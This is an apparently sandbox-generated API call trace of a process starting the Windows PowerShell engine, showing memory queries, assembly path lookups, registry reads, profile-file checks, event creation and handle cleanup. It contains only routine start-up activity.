	[0313.351] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.351] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.351] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.351] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.351] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.352] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.353] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.354] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.354] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.354] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.357] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0313.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.357] CoTaskMemFree (pv=0x471f80) 
	[0313.363] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0313.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.363] CoTaskMemFree (pv=0x471f80) 
	[0313.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.189] VirtualQuery (in: lpAddress=0x28b820, lpBuffer=0x28c6e0, dwLength=0x30 | out: lpBuffer=0x28c6e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0314.193] VirtualQuery (in: lpAddress=0x28b820, lpBuffer=0x28c6e0, dwLength=0x30 | out: lpBuffer=0x28c6e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.193] VirtualQuery (in: lpAddress=0x28b070, lpBuffer=0x28bf30, dwLength=0x30 | out: lpBuffer=0x28bf30*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.193] VirtualQuery (in: lpAddress=0x28b070, lpBuffer=0x28bf30, dwLength=0x30 | out: lpBuffer=0x28bf30*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.194] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x394) returned 0x0
	[0314.194] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d5fc, lpData=0x0, lpcbData=0x28d5f8*=0x0 | out: lpType=0x28d5fc*=0x1, lpData=0x0, lpcbData=0x28d5f8*=0x56) returned 0x0
	[0314.194] CoTaskMemAlloc (cb=0x5a) returned 0x1b723d40
	[0314.194] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d5cc, lpData=0x1b723d40, lpcbData=0x28d5c8*=0x56 | out: lpType=0x28d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d5c8*=0x56) returned 0x0
	[0314.194] CoTaskMemFree (pv=0x1b723d40) 
	[0314.194] RegCloseKey (hKey=0x394) returned 0x0
	[0314.194] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x394) returned 0x0
	[0314.195] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d5fc, lpData=0x0, lpcbData=0x28d5f8*=0x0 | out: lpType=0x28d5fc*=0x1, lpData=0x0, lpcbData=0x28d5f8*=0x56) returned 0x0
	[0314.195] CoTaskMemAlloc (cb=0x5a) returned 0x1b723d40
	[0314.195] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d5cc, lpData=0x1b723d40, lpcbData=0x28d5c8*=0x56 | out: lpType=0x28d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d5c8*=0x56) returned 0x0
	[0314.195] CoTaskMemFree (pv=0x1b723d40) 
	[0314.195] RegCloseKey (hKey=0x394) returned 0x0
	[0314.195] CoTaskMemAlloc (cb=0x20c) returned 0x469b80
	[0314.196] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x469b80 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0314.196] CoTaskMemFree (pv=0x469b80) 
	[0314.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0314.196] CoTaskMemAlloc (cb=0x20c) returned 0x469b80
	[0314.196] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x469b80 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0314.196] CoTaskMemFree (pv=0x469b80) 
	[0314.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0314.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0314.197] SetErrorMode (uMode=0x1) returned 0x1
	[0314.197] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d5e0 | out: lpFileInformation=0x28d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0314.197] SetErrorMode (uMode=0x1) returned 0x1
	[0314.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0314.198] SetErrorMode (uMode=0x1) returned 0x1
	[0314.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d5e0 | out: lpFileInformation=0x28d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0314.198] SetErrorMode (uMode=0x1) returned 0x1
	[0314.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0314.198] SetErrorMode (uMode=0x1) returned 0x1
	[0314.198] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d5e0 | out: lpFileInformation=0x28d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0314.198] SetErrorMode (uMode=0x1) returned 0x1
	[0314.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0314.198] SetErrorMode (uMode=0x1) returned 0x1
	[0314.199] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d5e0 | out: lpFileInformation=0x28d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0314.199] SetErrorMode (uMode=0x1) returned 0x1
	[0314.200] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0314.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.200] CoTaskMemFree (pv=0x471f80) 
	[0314.200] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0314.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.200] CoTaskMemFree (pv=0x471f80) 
	[0314.201] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0314.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.201] CoTaskMemFree (pv=0x471f80) 
	[0314.202] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0314.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.202] CoTaskMemFree (pv=0x471f80) 
	[0314.207] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0314.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.207] CoTaskMemFree (pv=0x471f80) 
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0314.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0314.209] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0314.209] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0314.210] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0314.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.210] CoTaskMemFree (pv=0x471f80) 
	[0314.212] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0314.212] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x28d7c0 | out: lpMode=0x28d7c0) returned 1
	[0315.030] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.030] CoTaskMemFree (pv=0x471f80) 
	[0315.034] SetEvent (hEvent=0x328) returned 1
	[0315.034] SetEvent (hEvent=0x394) returned 1
	[0315.034] SetEvent (hEvent=0x398) returned 1
	[0315.034] SetEvent (hEvent=0x32c) returned 1
	[0315.034] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0315.036] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.036] CoTaskMemFree (pv=0x471f80) 
	[0315.036] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d518 | out: phkResult=0x28d518*=0x3a0) returned 0x0
	[0315.036] RegQueryValueExW (in: hKey=0x3a0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x28d49c, lpData=0x0, lpcbData=0x28d498*=0x0 | out: lpType=0x28d49c*=0x0, lpData=0x0, lpcbData=0x28d498*=0x0) returned 0x2

Thread:
	id = 76
	os_tid = 0x9ac


Thread:
	id = 83
	os_tid = 0xa00


Thread:
	id = 91
	os_tid = 0xa2c


Thread:
	id = 105
	os_tid = 0x6f4


Thread:
	id = 109
	os_tid = 0x210

	[0251.896] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0294.064] LocalFree (hMem=0x4772c0) returned 0x0
	[0294.064] CloseHandle (hObject=0x1cc) returned 1
	[0294.064] CloseHandle (hObject=0x13) returned 1
	[0294.065] CloseHandle (hObject=0xf) returned 1
	[0294.065] RegCloseKey (hKey=0x308) returned 0x0
	[0294.065] RegCloseKey (hKey=0x304) returned 0x0
	[0294.066] RegCloseKey (hKey=0x300) returned 0x0
	[0294.066] LocalFree (hMem=0x477290) returned 0x0
	[0294.066] RegCloseKey (hKey=0x328) returned 0x0
	[0298.972] RegCloseKey (hKey=0x32c) returned 0x0
	[0309.753] RegCloseKey (hKey=0x3ac) returned 0x0
	[0309.753] RegCloseKey (hKey=0x38c) returned 0x0
	[0309.754] RegCloseKey (hKey=0x388) returned 0x0
	[0309.754] RegCloseKey (hKey=0x384) returned 0x0
	[0309.754] RegCloseKey (hKey=0x380) returned 0x0
	[0309.755] RegCloseKey (hKey=0x37c) returned 0x0
	[0309.755] RegCloseKey (hKey=0x378) returned 0x0
	[0309.755] RegCloseKey (hKey=0x374) returned 0x0
	[0309.755] RegCloseKey (hKey=0x34c) returned 0x0
	[0309.755] RegCloseKey (hKey=0x3a8) returned 0x0
	[0309.756] RegCloseKey (hKey=0x3a4) returned 0x0
	[0309.756] RegCloseKey (hKey=0x36c) returned 0x0
	[0309.756] RegCloseKey (hKey=0x368) returned 0x0
	[0309.757] RegCloseKey (hKey=0x364) returned 0x0
	[0309.757] RegCloseKey (hKey=0x360) returned 0x0
	[0309.757] RegCloseKey (hKey=0x35c) returned 0x0
	[0309.757] RegCloseKey (hKey=0x358) returned 0x0
